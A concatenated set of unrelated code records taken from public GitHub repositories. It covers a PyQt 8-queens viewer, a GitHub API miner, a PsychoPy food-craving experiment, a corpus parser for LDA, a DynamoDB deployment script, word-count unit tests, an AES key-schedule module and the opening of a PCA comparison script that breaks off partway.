super().__init__()\r\n layout = QtWidgets.QGridLayout(self)\r\n layout.setSpacing(5)\r\n layout.setContentsMargins(0, 0, 0, 0)\r\n self.myboard = brd\r\n self.number_of_all_possibilities = QtWidgets.QLabel()\r\n self.number_of_all_possibilities.setAlignment(Qt.AlignCenter)\r\n self.default_color = 1\r\n self.button = QtWidgets.QPushButton('Click me')\r\n self.button.setFixedWidth(120)\r\n self.next = QtWidgets.QPushButton('Next')\r\n self.next.setFixedWidth(120)\r\n self.previous = QtWidgets.QPushButton('Previous')\r\n self.black_mode = QtWidgets.QRadioButton()\r\n self.white_mode = 
QtWidgets.QRadioButton()\r\n self.black_mode.setChecked(True)\r\n self.black_mode.setText(\"Black Mode\")\r\n self.white_mode.setText(\"White Mode\")\r\n self.black_mode.toggled.connect(self.black_selected)\r\n self.white_mode.toggled.connect(self.white_selected)\r\n self.previous.setFixedWidth(120)\r\n self.previous.setEnabled(False)\r\n self.next.setEnabled(False)\r\n self.lst = None\r\n self.button.clicked.connect(lambda: self.draw_queens(8))\r\n self.button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.next.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.previous.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.black_mode.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.white_mode.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\r\n self.next.clicked.connect(self.next_draw)\r\n self.previous.clicked.connect(self.previous_draw)\r\n layout.addWidget(self.number_of_all_possibilities)\r\n layout.addWidget(self.black_mode)\r\n layout.addWidget(self.white_mode)\r\n layout.addWidget(self.button)\r\n layout.addWidget(self.previous)\r\n layout.addWidget(self.next)\r\n def black_selected(self,selected):\r\n if selected:\r\n self.default_color = 1\r\n if self.lst != None:\r\n self.myboard.clear_widgets()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n\r\n def white_selected(self,selected):\r\n if selected:\r\n self.default_color = 0\r\n if self.lst != None:\r\n self.myboard.clear_widgets()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n\r\n def next_draw(self):\r\n global default_index\r\n default_index += 1\r\n self.myboard.clear_widgets()\r\n self.previous.setEnabled(True)\r\n if default_index == len(self.lst)-1:\r\n self.next.setEnabled(False)\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n def previous_draw(self):\r\n global default_index\r\n default_index -= 1\r\n self.myboard.clear_widgets()\r\n self.next.setEnabled(True)\r\n if default_index == 0:\r\n self.previous.setEnabled(False)\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n def draw_queens(self,t):\r\n global default_index\r\n self.lst = start(8,t)\r\n self.next.setEnabled(True)\r\n self.number_of_all_possibilities.setText(\"ALL : \"+str(len(self.lst)))\r\n self.number_of_all_possibilities.adjustSize()\r\n self.myboard.drawing(self.lst[default_index],self.default_color)\r\n self.button.setEnabled(False)\r\n\r\nclass Board(QtWidgets.QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n layout = QtWidgets.QGridLayout(self)\r\n layout.setSpacing(0)\r\n layout.setContentsMargins(0, 0, 0, 0)\r\n self.background = QtGui.QPixmap('photo.jpg')\r\n self.mylayout = layout\r\n \r\n def clear_widgets(self):\r\n for i in reversed(range(self.mylayout.count())): \r\n self.mylayout.itemAt(i).widget().setParent(None)\r\n\r\n def drawing(self,l,c):\r\n for item in l:\r\n self.mylayout.addWidget(Pawn(c), item[0]-1, item[1]-1)\r\n\r\n def minimumSizeHint(self):\r\n return QtCore.QSize(500, 500)\r\n\r\n def sizesHint(self):\r\n return QtCore.QSize(1000, 1000)\r\n\r\n def resizeEvent(self, event):\r\n size = min(self.width(), self.height())\r\n rect = QtCore.QRect(0, 0, size, size)\r\n rect.moveCenter(self.rect().center())\r\n self.layout().setGeometry(rect)\r\n\r\n def paintEvent(self, event):\r\n qp = QtGui.QPainter(self)\r\n rect = self.layout().geometry()\r\n qp.drawPixmap(rect, self.background.scaled(rect.size(), \r\n QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation))\r\n \r\n\r\nclass 
ChessGame(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setWindowTitle('Chess Game')\r\n central = QtWidgets.QWidget()\r\n self.setCentralWidget(central)\r\n layout = QtWidgets.QVBoxLayout(central)\r\n layout.setSpacing(10)\r\n layout.setAlignment(Qt.AlignCenter)\r\n self.board = Board()\r\n layout.addWidget(self.board)\r\n self.process = process(self.board)\r\n layout.addWidget(self.process)\r\n\r\nimport sys\r\ndefault_index = 0\r\napp = QtWidgets.QApplication(sys.argv)\r\ngame = ChessGame()\r\ngame.show()\r\nsys.exit(app.exec_())","repo_name":"paranism0/8queens","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6086173704","text":"import datetime\nimport json\nimport os\nfrom time import sleep\n\nimport pandas as pd\nimport requests\n\nBASE_PATH = os.path.dirname(os.path.dirname(__file__))\ndata_path = os.path.join(BASE_PATH, 'data')\n\n\nclass GitMiner:\n def __init__(self):\n self.base_url = 'https://api.github.com'\n with open(os.path.join(BASE_PATH, 'conf', 'auth.conf'), 'r') as file:\n lines = file.readlines()\n self.token = lines[2].split('\\n')[0]\n self.session = requests.Session()\n self.headers = {'Authorization': 'token ' + self.token,\n 'content-type': 'application/json'}\n self.popular_repos = []\n\n def get_popular_repos(self):\n self.headers['accept'] = 'application/vnd.github.cloak-preview'\n api = '/search/repositories?q=stars:>1&sort=stars'\n response = self.session.get(self.base_url + api, headers=self.headers)\n results = json.loads(response.text)\n # results['items'][0]['full_name']\n print()\n\n def get_projects_with_coc(self):\n self.headers['accept'] = 'application/vnd.github.v3+json'\n # repos that contain a code of conduct in their root directory\n api = '/search/code?q=filename:code_of_conduct+path%3A%2F&sort=indexed&order=asc&per_page=100&page='\n repo, path = [], []\n for i in range(1, 11): # only first 1000 results\n response = self.session.get(self.base_url+api+str(i), headers=self.headers)\n results = json.loads(response.text)\n while True:\n try:\n repo += [item['repository']['full_name'] for item in results['items']]\n path += [item['path'] for item in results['items']]\n break\n except KeyError: # rate limit\n sleep(90)\n pass\n sleep(30)\n return repo, path\n\n def get_project_features(self, projects):\n self.headers['accept'] = 'application/vnd.github.v3+json'\n api = '/repos/'\n last_date = datetime.datetime(2021, 6, 8).timestamp()\n stars, age, size = [], [], []\n for p in projects:\n response = self.session.get(self.base_url + api + p, headers=self.headers, verify=False)\n results = json.loads(response.text)\n stars.append(results['stargazers_count'])\n size.append(results['size'])\n created_at = datetime.datetime.strptime(results['created_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()\n age.append(int(last_date - created_at))\n\n pd.DataFrame({'repository_url': projects, 'star': stars, 'size': size, 'age': age})\\\n .to_csv('repo_info.csv', index=False)\n\n\nif __name__ == '__main__':\n miner = GitMiner()\n projects = pd.read_csv(os.path.join(data_path, 'All_Pulls.csv'))['repository_url'].unique().tolist()\n miner.get_project_features(projects)\n # repo, path = miner.get_projects_with_coc()\n # df = pd.DataFrame({'repo': repo, 'path': path})\n # df.to_csv(os.path.join(data_path, 'coc_repos.csv'), index=False)\n # from os import listdir\n # from os.path import isfile, join\n # 
mypath = os.path.join(data_path, 'prs')\n # onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n # print(onlyfiles)\n # pr_size = []\n # for i in onlyfiles:\n # df = pd.read_csv(os.path.join(mypath, i))\n # pr_size.append(len(df))\n # onlyfiles = [i.split('_')[0] for i in onlyfiles]\n # df = pd.DataFrame({'project': onlyfiles, 'n_pr': pr_size})\n # df.to_csv(os.path.join(mypath, 'stats.csv'))\n","repo_name":"hosseinkshvrz/coc","sub_path":"src/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34581690879","text":"#Food Craving\nfrom __future__ import absolute_import, division\nfrom psychopy import locale_setup, sound, gui, visual, core, data, event, logging, clock\nfrom psychopy.constants import (NOT_STARTED, STARTED, PLAYING, PAUSED,\n STOPPED, FINISHED, PRESSED, RELEASED, FOREVER)\nimport os\nimport csv\nimport sys\n\n_thisDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(_thisDir)\n\npsychopyVersion = '3.0.7'\nexpName = 'FoodCraving'\nexpInfo = {'participant': '', 'session': '001'}\ndlg = gui.DlgFromDict(dictionary=expInfo, title=expName)\nif dlg.OK == False:\n core.quit()\nexpInfo['date'] = data.getDateStr()\nexpInfo['expName'] = expName\nexpInfo['psychopyVersion'] = psychopyVersion\n\nfilename = _thisDir + os.sep + u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])\n\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath='C:\\\\Users\\\\Jojo\\\\Downloads\\\\Helion Lab\\\\Experiment Files\\\\Food Regulation\\\\FoodCraving.py',\n savePickle=True, saveWideText=True,\n dataFileName=filename)\nlogFile = logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)\n\nendExpNow = False\n\nwin = visual.Window(size=(1024, 768), fullscr=True, screen=0,allowGUI=True, allowStencil=False,\n monitor='testMonitor', color=[0,0,0], colorSpace='rgb',blendMode='avg', useFBO=True, units='height')\n\nexpInfo['frameRate'] = win.getActualFrameRate()\nif expInfo['frameRate'] != None:\n frameDur = 1.0 / round(expInfo['frameRate'])\nelse:\n frameDur = 1.0 / 60.0 \n\nglobalClock = core.Clock()\nroutineTimer = core.CountdownTimer()\n\n#set up components\nintroClock=core.Clock()\nInstText = visual.TextStim(win=win, text='In this part of the study you will be given a regulation strategy to use while viewing pictures of food.\\n\\nThen you will use a rating scale to ' +\n 'indicate how much you are craving the food item.\\n\\nWhen you are ready, press space to start!', color='white', pos=(0,0), height=0.07, wrapWidth=1.3)\nTYClock = core.Clock()\nendText = visual.TextStim(win=win, text='Thank you for participating!\\n\\nYou have completed this part of the study.', font='Arial', pos=(0, 0), height=0.1, wrapWidth=None, color='white')\n\ncueClock=core.Clock()\ncueType= visual.TextStim(win=win, text='default', color='white', pos=(0,0), height=0.14)\nISIClock=core.Clock()\nisi = visual.TextStim(win=win, text='+', color='white', pos=(0,0), height=0.1)\nImageClock=core.Clock()\nfoodPic=visual.ImageStim(win=win, image='sin', pos=(0,0))\n\nratingsClock = core.Clock()\nquestion = visual.TextStim(win=win, text='How much are you craving this food?', font='Arial', pos=(0, 0.15), height=0.07, wrapWidth=None, color='white');\nratingScale = visual.RatingScale(win=win, marker='triangle', size=1.3, pos=[0.0, -0.4], low=1, high=7, labels=[''], scale='')\nscaleMsg1 = 
visual.TextStim(win=win, text='Not at all', font='Arial', pos=(-0.45, -0.13), height=0.04, color='white');\nscaleMsg2 = visual.TextStim(win=win, text='Very much', font='Arial', pos=(0.45, -0.13), height=0.04, color='white');\n\n\n#isi function\ndef isiFunc():\n t = 0\n ISIClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(3.000000)\n ISIComponents = [isi]\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n #begin isi\n while continueRoutine and routineTimer.getTime() > 0:\n t = ISIClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and isi.status == NOT_STARTED:\n isi.tStart = t\n isi.frameNStart = frameN\n isi.setAutoDraw(True)\n frameRemains = 0.0 + 1.0- win.monitorFramePeriod * 0.75\n if isi.status == STARTED and t >= frameRemains:\n isi.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n #end isi\n for thisComponent in ISIComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n\n\n#start running the intro screen\nt = 0\nintroClock.reset()\nframeN = -1\ncontinueRoutine = True\nspace = event.BuilderKeyResponse()\nintroComponents = [InstText, space]\nfor thisComponent in introComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\nwhile continueRoutine:\n t = introClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and InstText.status == NOT_STARTED:\n InstText.tStart = t\n InstText.frameNStart = frameN\n InstText.setAutoDraw(True)\n \n if t >= 0.0 and space.status == NOT_STARTED:\n space.tStart = t\n space.frameNStart = frameN\n space.status = STARTED\n win.callOnFlip(space.clock.reset)\n event.clearEvents(eventType='keyboard')\n if space.status == STARTED:\n theseKeys = event.getKeys(keyList=['space'])\n \n if \"escape\" in theseKeys:\n endExpNow = True\n if len(theseKeys) > 0:\n space.keys = theseKeys[-1]\n space.rt = space.clock.getTime()\n continueRoutine = False\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in introComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\nfor thisComponent in introComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\nif space.keys in ['', [], None]:\n space.keys=None\nthisExp.addData('space.keys',space.keys)\nif space.keys != None:\n thisExp.addData('space.rt', space.rt)\nthisExp.nextEntry()\nroutineTimer.reset()\n\ntrials = data.TrialHandler(nReps=1, method='random', \n extraInfo=expInfo, originPath=-1,\n trialList=data.importConditions('FoodReg.csv'),\n seed=None, name='trials')\nthisExp.addLoop(trials)\nthisTrial = trials.trialList[0]\nif thisTrial != None:\n for paramName in thisTrial:\n exec('{} = thisTrial[paramName]'.format(paramName))\n\nfor thisTrial in trials:\n currentLoop = trials\n if thisTrial != None:\n for paramName in thisTrial:\n exec('{} = thisTrial[paramName]'.format(paramName))\n #regulation cue\n t = 0\n cueClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(2.000000)\n cueType.setText(CueType)\n 
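# Editor's note: CueType here (and Picture below) are assumed to be column\n    # names of FoodReg.csv, bound as local variables by the exec() call in the\n    # trial loop above.\n    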
cueComponents = [cueType]\n for thisComponent in cueComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = cueClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and cueType.status == NOT_STARTED:\n cueType.tStart = t\n cueType.frameNStart = frameN\n cueType.setAutoDraw(True)\n frameRemains = 0.0 + 2- win.monitorFramePeriod * 0.7\n if cueType.status == STARTED and t >= frameRemains:\n cueType.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in cueComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\n for thisComponent in cueComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n #food pics\n t = 0\n ImageClock.reset() \n frameN = -1\n continueRoutine = True\n routineTimer.add(8.000000)\n foodPic.setImage(Picture)\n ImageComponents = [foodPic]\n for thisComponent in ImageComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = ImageClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and foodPic.status == NOT_STARTED:\n foodPic.tStart = t\n foodPic.frameNStart = frameN\n foodPic.setAutoDraw(True)\n frameRemains = 0.0 + 8- win.monitorFramePeriod * 0.75\n if foodPic.status == STARTED and t >= frameRemains:\n foodPic.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ImageComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n for thisComponent in ImageComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n \n isiFunc()\n \n #ratings\n t = 0\n ratingsClock.reset()\n frameN = -1\n continueRoutine = True\n routineTimer.add(5.000000)\n question.setText('How much are you craving this food?')\n ratingScale.reset()\n scaleMsg1.setText('Not at all')\n scaleMsg2.setText('Very Much')\n ratingsComponents = [question, ratingScale, scaleMsg1, scaleMsg2]\n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n \n while continueRoutine and routineTimer.getTime() > 0:\n t = ratingsClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and question.status == NOT_STARTED:\n question.tStart = t\n question.frameNStart = frameN\n question.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if question.status == STARTED and t >= frameRemains:\n question.setAutoDraw(False)\n if t >= 0.0 and ratingScale.status == NOT_STARTED:\n ratingScale.tStart = t\n ratingScale.frameNStart = frameN\n ratingScale.setAutoDraw(True)\n continueRoutine &= ratingScale.noResponse\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if ratingScale.status == STARTED and t >= frameRemains:\n ratingScale.setAutoDraw(False)\n \n if t >= 0.0 and scaleMsg1.status == NOT_STARTED:\n scaleMsg1.tStart = t\n scaleMsg1.frameNStart = frameN\n scaleMsg1.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if scaleMsg1.status == STARTED and t >= frameRemains:\n scaleMsg1.setAutoDraw(False)\n \n if t >= 
0.0 and scaleMsg2.status == NOT_STARTED:\n scaleMsg2.tStart = t\n scaleMsg2.frameNStart = frameN\n scaleMsg2.setAutoDraw(True)\n frameRemains = 0.0 + 5- win.monitorFramePeriod * 0.75\n if scaleMsg2.status == STARTED and t >= frameRemains:\n scaleMsg2.setAutoDraw(False)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n \n for thisComponent in ratingsComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\n trials.addData('ratingScale.response', ratingScale.getRating())\n trials.addData('ratingScale.rt', ratingScale.getRT())\n \n isiFunc()\n\n#endText\nt= 0\nTYClock.reset()\nframeN = -1\ncontinueRoutine = True\nTYComponents = [endText]\nfor thisComponent in TYComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\nwhile continueRoutine:\n t = TYClock.getTime()\n frameN = frameN + 1\n \n if t >= 0.0 and endText.status == NOT_STARTED:\n endText.tStart = t\n endText.frameNStart = frameN\n endText.setAutoDraw(True)\n \n if endExpNow or event.getKeys(keyList=[\"escape\"]):\n core.quit()\n \n if not continueRoutine:\n break\n continueRoutine = False\n for thisComponent in TYComponents:\n if hasattr(thisComponent, \"status\") and thisComponent.status != FINISHED:\n continueRoutine = True\n break\n \n if continueRoutine:\n win.flip()\n\nfor thisComponent in TYComponents:\n if hasattr(thisComponent, \"setAutoDraw\"):\n thisComponent.setAutoDraw(False)\nroutineTimer.reset()\nthisExp.saveAsWideText(filename+'.csv')\nthisExp.saveAsPickle(filename)\nlogging.flush()\nthisExp.abort()\nwin.close()\ncore.quit()\n\n","repo_name":"social-and-affective-neuroscience-lab/Self-Regulation-Psychopy-Files","sub_path":"FoodRegulation/FoodCraving.py","file_name":"FoodCraving.py","file_ext":"py","file_size_in_byte":13303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32299570035","text":"\nfrom movie_page_parser import parseMoviePageHTML\n\nclass CorpusParser:\n\n FILE_NAMES = []\n STOP_FILE = \"stop.txt\"\n STOP_WORDS = []\n DOC_MAPS = []\n MASTER_MAP = {}\n TERMS = []\n\n def __init__(self, fileNames):\n self.FILE_NAMES = fileNames\n self.readStopWords()\n self.readWords()\n self.sortTerms()\n\n def readStopWords(self):\n with open(self.STOP_FILE) as file:\n for line in file:\n for word in line.split():\n self.STOP_WORDS.append(word)\n \n def readWords(self):\n for fileName in self.FILE_NAMES:\n docMap = {}\n with open(fileName) as file:\n text = parseMoviePageHTML(file.read())\n for word in text.split():\n word = word.lower()\n if word in docMap:\n docMap[word] += 1\n else:\n docMap[word] = 1\n if word in self.MASTER_MAP:\n self.MASTER_MAP[word] += 1\n else:\n self.MASTER_MAP[word] = 1\n \n for stopWord in self.STOP_WORDS:\n docMap.pop(stopWord, None)\n self.MASTER_MAP.pop(stopWord, None)\n \n self.DOC_MAPS.append(docMap)\n\n def sortTerms(self):\n for [itemKey, itemValue] in self.MASTER_MAP.items():\n docFrequency = 0\n for i in range(len(self.FILE_NAMES)):\n if itemKey in self.DOC_MAPS[i]:\n docFrequency += 1\n self.TERMS.append(Word(itemKey, itemValue, docFrequency))\n\n self.TERMS.sort(reverse=True, key=lambda word: word.frequency)\n\n def getDocWordIdFreq(self, docId, wordId):\n word = self.TERMS[wordId]\n 
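# Editor's note: TERMS stores Word objects while the DOC_MAPS dictionaries\n        # are keyed by raw token strings, so the lookup below uses word.value.\n        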
docMap = self.DOC_MAPS[docId]\n        if word.value in docMap:\n            return docMap[word.value]\n        else:\n            return 0\n\n    def getDocWordFreq(self, docId, word):\n        docMap = self.DOC_MAPS[docId]\n        if word in docMap:\n            return docMap[word]\n        else:\n            return 0\n\n    def getWordFromIndex(self, index):\n        return self.TERMS[index]\n\n    def generateLDADataset(self, filename=\"lda_dataset.txt\", numWords=5):\n        topWords = self.TERMS[:numWords]\n        output = \"\"\n        for i in range(len(self.FILE_NAMES)):\n            output += f\"{i}\"\n            for j, word in enumerate(topWords):\n                docFreq = self.getDocWordFreq(i, word.value)\n                output += f\" {j + 1}:{docFreq}\"\n            output += \"\\n\"\n        with open(filename, \"w\") as file:\n            file.write(output)\n\n\nclass Word:\n    value = \"\"\n    frequency = 0\n    documentFrequency = 0\n\n    def __init__(self, value, frequency, documentFrequency):\n        self.value = value\n        self.frequency = frequency\n        self.documentFrequency = documentFrequency","repo_name":"juleskuehn/comp4601","sub_path":"A2/COMP4601-RS/LDA/corpus_parser.py","file_name":"corpus_parser.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"6884563183","text":"# Adds a version entry to deployment table\nimport sys\nimport boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nimport maya\nfrom dynamodb_json import json_util\nfrom decimal import Decimal\n\n\nif __name__ == '__main__':\n    args = sys.argv\n    if len(args) >= 3:\n        stage = args[1]\n        script_number = args[2]\n\n    os.environ['STAGE'] = stage\n\n    config_filename = 'config.' + stage + '.json'\n    parent_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n    config_filepath = os.path.join(parent_dir, config_filename)\n\n    with open(config_filepath, 'r') as fp:\n        config = json.load(fp)\n\n    region = config['REGION']\n\n    client = boto3.client('dynamodb', region_name=region)\n\n    # insert item\n    response = client.put_item(\n        TableName='sp-deployment',\n        Item={\n            'script_number': {\n                'N': str(script_number)\n            },\n            'timestamp': {\n                'S': str(maya.now().iso8601())\n            },\n            'stage': {\n                'S': str(stage)\n            }\n        }\n    )","repo_name":"EcorRouge/sample-api","sub_path":"deployment_scripts/common/update_version.py","file_name":"update_version.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"15730776040","text":"import unittest\nfrom c3_wordcount_tests_version import count, get_word_counts\n\nclass TestWordcount(unittest.TestCase):\n\n    quote = 'Diligence is the mother of good luck.'\n\n    text = \"Call me Ishmael. Some years ago—never mind how long precisely—having \\\nlittle or no money in my purse, and nothing particular \\\nto interest me on shore, I thought I would sail about a little and see \\\nthe watery part of the world. 
It is a way I have of driving off the \\\nspleen and regulating the circulation.\"\n\n def test_count_common_cases(self):\n \"\"\"Test common cases for the count() function.\"\"\"\n self.assertEqual(count(self.quote, 'the'), 2)\n\n def test_get_word_counts_common_cases(self):\n \"\"\"Test common cases for the get_word_counts() function.\"\"\"\n\n## self.assertEqual(get_word_counts(text, 'the', 20), 4 / 15)\n self.assertEqual(get_word_counts(self.text, 'spleen', 20), 1 / 15)\n self.assertEqual(get_word_counts(self.text, 'I', 20), 5 / 15)\n\n def test_get_word_counts_boundary_cases(self):\n \"\"\"Test boundary cases for get_word_counts() function.\"\"\"\n\n # Window length is on boundary of requirement that it be a positive int:\n self.assertEqual(get_word_counts(self.text, 'spleen', 1), 0)\n # Text same size as window length (requirement is len(text) >= window length_\n self.assertEqual(get_word_counts(self.text, 'I', 301), 5 / 1)\n\n def test_get_word_counts_corner_cases(self):\n \"\"\"Test corner cases for get_word_counts() function.\"\"\"\n\n # What if text and word are the same?\n self.assertEqual(get_word_counts('a', 'a', 1), 1)\n\nif __name__ == '__main__':\n unittest.main()\n \n \n","repo_name":"B-T-D/DCS_work_backup","sub_path":"CH7_designing_programs/unittest_module_wordcount_tests.py","file_name":"unittest_module_wordcount_tests.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29575140891","text":"import numpy as np\n\nrctab = [-1] * 500\nMASK8 = (1 << 8) - 1\nMASK32 = (1 << 32) - 1\nKEY_LEN = 128\n\nN = 4 # number of 32 bit words in original key\n\ndef get_words(key, total_bits=32, word_bits=8):\n\tresult = []\t\n\tmask = (1 << word_bits) - 1\n\tfor i in range(total_bits//word_bits):\n\t\tresult.append(key & mask)\n\t\tkey >>= word_bits\n\treturn result[::-1]\n\ndef get_num(words : list[int], word_sz=8) -> int:\n\tresult=0\n\tfor word in words:\n\t\tresult <<= word_sz\n\t\tresult |= word\n\n\treturn result\n\ndef rc(i : int) -> int:\n\tif i == 1: return 1\n\tif rctab[i] != -1: return rctab[i]\n\n\tlast = rc(i-1)\n\tif last < 0x80: \n\t\trctab[i] = (2*last) & MASK8\n\t\treturn rctab[i]\n\t\n\trctab[i] = ((2*last) ^ 0x11B) & MASK8\n\treturn rctab[i]\n\ndef rcon(i : int) -> int:\n\treturn get_num([rc(i),0,0,0])\n\n\ndef subword(x: int, sbox) -> int:\n\twords = get_words(x, 32, 8)\n\twords = [sbox[word] for word in words]\n\treturn get_num(words)\n\ndef rotword(x : int) -> int:\n\twords = np.roll(get_words(x,32,8), -1)\n\treturn get_num(words)\n\n\ndef getkeys(key, rounds, sbox):\n\tkey_words = get_words(key, KEY_LEN, 32)\n\t\n\tfor i in range(N, 4*rounds):\n\t\tlast_w = key_words[i-1]\n\t\told_w = key_words[i-N]\n\t\tif i % N == 0:\n\t\t\tnew_w = subword(rotword(last_w), sbox) ^ rcon(i//N) ^ old_w\n\t\t\tkey_words.append(new_w)\n\t\telif N > 6 and i % N == 4:\n\t\t\tnew_w = old_w ^ subword(last_w,sbox)\n\t\t\tkey_words.append(new_w)\n\t\telse:\n\t\t\tnew_w = old_w ^ last_w\n\t\t\tkey_words.append(new_w)\n\t\n\treturn key_words\n\n\n\t\n\n","repo_name":"RuanPetrus/compsec-02","sub_path":"keyschedule.py","file_name":"keyschedule.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23421991678","text":"#!/usr/bin/env python3\n\"\"\"\nThis compares two sets of {.eigenval, .eigenvec, .eigenvec.var} files, and\nverifies that symmetric absolute percentage error between the two sets 
is less\nthan the given tolerance. (To avoid spurious test failures due to isolated\nnear-zero values, we only compute a single error statistic on sums of absolute\nvalues, instead of taking means across all samples/PCs.)\n\"\"\"\n\nimport argparse\nimport csv\nimport sys\n\ndef parse_commandline_args():\n \"\"\"\n Standard command-line parser.\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n requiredarg = parser.add_argument_group('Required Arguments')\n requiredarg.add_argument('-1', '--plink1', type=str, required=True,\n help=\"Filename prefix for plink1 PCA values.\")\n requiredarg.add_argument('-2', '--plink2', type=str, required=True,\n help=\"Filename prefix for plink2 PCA values to validate.\")\n requiredarg.add_argument('-t', '--tolerance', type=float, required=True,\n help=\"Maximum allowed SMAE.\")\n cmd_args = parser.parse_args()\n return cmd_args\n\n\n# See https://stackoverflow.com/questions/5574702/how-to-print-to-stderr-in-python .\ndef eprint(*args):\n print(*args, file=sys.stderr)\n\n\ndef main():\n cmd_args = parse_commandline_args()\n pc_ct = 0\n tol = cmd_args.tolerance\n with open(cmd_args.plink1 + '.eigenval', 'r') as eigval1_file, open(cmd_args.plink2 + '.eigenval', 'r') as eigval2_file:\n absdiff_sum = 0.0\n avgabs_x2_sum = 0.0\n for line1 in eigval1_file:\n line1 = line1.rstrip('\\n')\n eigval1 = float(line1)\n line2 = eigval2_file.readline()\n line2 = line2.rstrip('\\n')\n eigval2 = float(line2)\n absdiff_sum += abs(eigval2 - eigval1)\n avgabs_x2_sum += abs(eigval2) + abs(eigval1)\n pc_ct += 1\n if absdiff_sum > tol * avgabs_x2_sum * 0.5:\n eprint('Eigenvalue mismatch.')\n sys.exit(1)\n with open(cmd_args.plink1 + '.eigenvec', 'r') as eigvec1_file, 